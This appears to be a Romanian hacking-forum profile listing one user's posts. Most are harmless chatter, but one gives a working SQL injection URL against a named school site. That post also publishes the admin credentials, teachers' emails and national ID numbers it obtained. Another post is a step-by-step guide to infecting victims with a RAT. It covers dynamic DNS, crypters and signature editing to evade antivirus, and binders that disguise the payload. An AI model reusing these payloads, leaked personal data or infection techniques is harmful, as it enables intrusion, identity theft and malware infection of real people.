say3er.
Active Members-
Posts
465 -
Joined
-
Last visited
-
Days Won
2
Everything posted by say3er.
-
Vand domeniul dustgame.info !!! Pret : 3 euro in Orange Domeniul mai este valabil 9 luni. PM cu id-ul de YM .
-
CHELOO - PRESEDINTE OMBLADON-Ministrul EDUCATIEI Bitza-Ministrul Sanatatii FreakaDaDisk-Ministrul Justitiei Markone1- Ministrul Finantelor Ce ziceti ?
-
Multumim !
-
DustGame.info - Gaming News Il am de 2 saptamani si are peste 300 vizitatori unici. Sper sa va placa.
-
Asta sa fie o manipulare ? nici pe departe ..asta e o prezentare a anumitor tipuri de factori cu care ne confruntam zi de zi. Iar urmatorul documentar va aparea in 2012 la inceputul anului. Acest documentar nu il poti intelege daca il vezi doar o data,ci de mai multe ori pentru ca are un continut intens iar daca l-ai vazut doar o data intelegi doar ce e asa, in mare parte.
-
Un documentar foarte interesant,merita vazut .
-
Grupul Scolar Industrial Stefan Procopiu Vaslui Target: http://stefanprocopiu.vaslui.rdsnet.ro/articol.php?idarticol=68%20and%201=NULL%20UNION%20ALL%20SELECT%201,@@version,3,4,5,6,7-- Admin: dpracsiu Password:5544 si cateva emailuri de la profesori sbirca@yahoo.com [bIRCA SILVIA] vasileeliza55@yahoo.com [bLANARU ELIZA] ciuleimaria@yahoo.com [CIULEI MARIA ] si niste cnp-uri de la profesori: 1691126070041 2730512374081 1731103374102 2790125374088 1600606374061 2780214374069 pff..ce rusine
-
Nu am inteles nimic din tutorialul asta ID(strEXPR text, intEXPR start, intEXPR length ce drq is astea
-
Un tutorial in romana sau unul in engleza dar sa fie explicit despre Blind SQL Injection
-
SURSA Inspectoratul ?colar din jude?ul Timis vine cu o propunere totalitara: elevii din ?coli generale ?i din licee s? intre in cladiri pe baza de amprenta digitala.Tinerii vor fi tratati ca niste infractori sub pretextul combaterii chiulului. Conducerea inspectororatului a declarat ca in luna octombrie elevii din judete au acumulat peste 500.000 de absente dintre care aproximativ 270.000 sunt nemotivate. Nici scaderea notei la purtare nu i-a convins pe elevii timisoreni sa renunte la chiulit asa ca Inspectoratul Judetean Scolar propune ca acestia sa fie tratati ca intr-un stat totalitar si sa fie amprentati. Reprezentantii institutiei spun ca s-au facut razii prin baruri si cafenele,cu politia pentru a-i culege pe chiulangii,insa acest lucru nu a adus la rezolvarea problemei. Inspectoratul scolar a contactat deja o firma care se ocupa de sisteme de securitate.Reprezentantii firmei au declarat ca fiecare elev trebuie sa plateasca aproximativ 10 lei pentru a acoperi costul echipamentului. Acestia vor fi doar bani aruncati pe impunerea unui sistem totalitar care afecteaza grav libertatea elevilor.
-
Nane-magic
-
Trojan (RAT): Our Trojan (Poison ivy, Darkcomet, Spy net, Cybergate etc.) has two parts a client and a server. Normally a matter of common sense in matters not related to hack the server is who runs the trojan client, but our type of connection established between our slave (the person you want to infect) and we reverse type is ie the client connects and manages the server. Therefore in 2 parts, the Trojan will Customer (which will help us command the server) and the server is what the slave must run so that we can establish a connection. Server: Our server was installed on the slave's PC and will respond to us by sending the information to our ip address and the information or data will be our Trojan (client). But what is the ip? IP stands for Internet Protocol and is a number that identifies a device on a network (a computer, printer, router, etc ...) that itself can be static (always the same) or dynamic (Varies from time to time) as as if we have an IP address 127.0.0.1, ordering our Trojan to respond to that address whether the same change will lose the connection. The solution? A DNS server. This allows us through a series of steps (registration and installation of an application) Replace put it our IP for a Host-no-ip.org eg mafia.no-ip.org. So if we tell the server to respond to mafia.no-ip.iorg for more IP address that our varieties will not lose the connection. Router: In the event that we have a router must open the ports or at least one of them to our server through can hear him. Here's a recap: So that our connection to be successful we must: 1 - Open ports. 2 - Installing a DNS client. 3 - Properly configure our Trojan. One of the factors that can prevent a successful connection are the antivirus and all will know the trojan is in the category of viruses for which the action of the antivirus is disabled or deleted. Therefore we must find a way for the Avs do not detect one of them is the Crypters. Antivirus: The antivirus software uses two methods to protect our PC: 1 - Analyze the file against the database of malware (signatures) would be like a police lineup or when attempting to identify a criminal with a picture: The antivirus compare each file on the hard disk with a "dictionary" of known viruses. If any piece of code (signatures) in a hard disk file matches with the virus known in the dictionary, the antivirus software kicks in and 2 - the constant monitoring of the behavior of files that can be infected. Crypters: Is often used to hide the source code (Signatures) of a server or a Trojan horse, very little is updated every time because as most of them running within days are detected by the Avs is why on some occasions the person who mode this crypter encrypted use a password to have a more limited access. The Crypter has a Stub which has signatures to encrypt our server or trojan is part of crypter is the one modified by various methods for the crypter undetectable. One of these methods is to use two programs and Dsplit Av Fucker with which the firm seeks the Avs and using a hex editor is modified such that the Avs signatures do not detect it. Encryption: It is a technique by which the information becomes unreadable to third parties. To access it you need a key (type encryption) who know only the sender and receiver. Some encryption types: AER-256, ARMON-64, ATOM-128, BASE-64, ESAB-46, EZIP-64, Feron-74, GILA7, Hazz-15, MEGAN-35, OKTO3, TIGO-3FX, TRIP -5, ZARA-128, ZONG22 Etc. Let's review: So that our connection to be successful we must: 1 - Open ports. 2 - Installing a DNS client. 3 - Properly configure our Trojan. 4 - Search Crypter Fud, that is undetectable to the Avs. Stub or modify one to make it detectable Fud. 5 - Encrypt file. Hiding: To send the server to our slave must hide to avoid being suspicious and run it. One way to hide the server is through still Binders and Joiners. Binder or joiner: These programs are very interesting to inadvertently infect the slave with viruses and Trojans. A binder (also called Joiner or splitter) is a program that links two or more files. These files can be executable or otherwise depending on the binder being used. Some binders can trick the slave server icon changing its own icon for a *. jpg image, a folder or a text document. Then: 1 - Open ports. 2 - Installing a DNS client. 3 - Properly configure our Trojan. 4 - Search Crypter Fud, that is undetectable to the Avs. Stub or modify one to make it detectable Fud. 5 - encrypt the Trojan. 6 - Find a Binder or a Joiner (Must be undetectable). 7 - Hiding our server encrypted. 8 - Ingenious for our slave will have the file.
-
Compania de telecomunicaţii BSNL din India a fost sparta
say3er. replied to say3er.'s topic in Stiri securitate
Daca chiar a sters baza de date...nu prea e intreg la minte. -
Un pakistanez numit "KhantastiC haX0r" a spart ast?zi site-ul oficial de telecomunicatii Company Bharat Sanchar Nigam Limited (BSNL).Nu e prima data cand BSNL a devenit victima unui atac cibernetic.In acest an 2011 atacurile sunt mai putine decat in anii anteriori,probabil ca o parte dintre ei sunt hackeri de tip"white hat".
-
Sunt in perioada de gratie
-
Demo:vBulletin Skin Demos - Powered by vBulletin Download:DM.rar
-
Ce cauta omule niste prosti ca Puya si ca Maximilian in discutia asta ? RIP !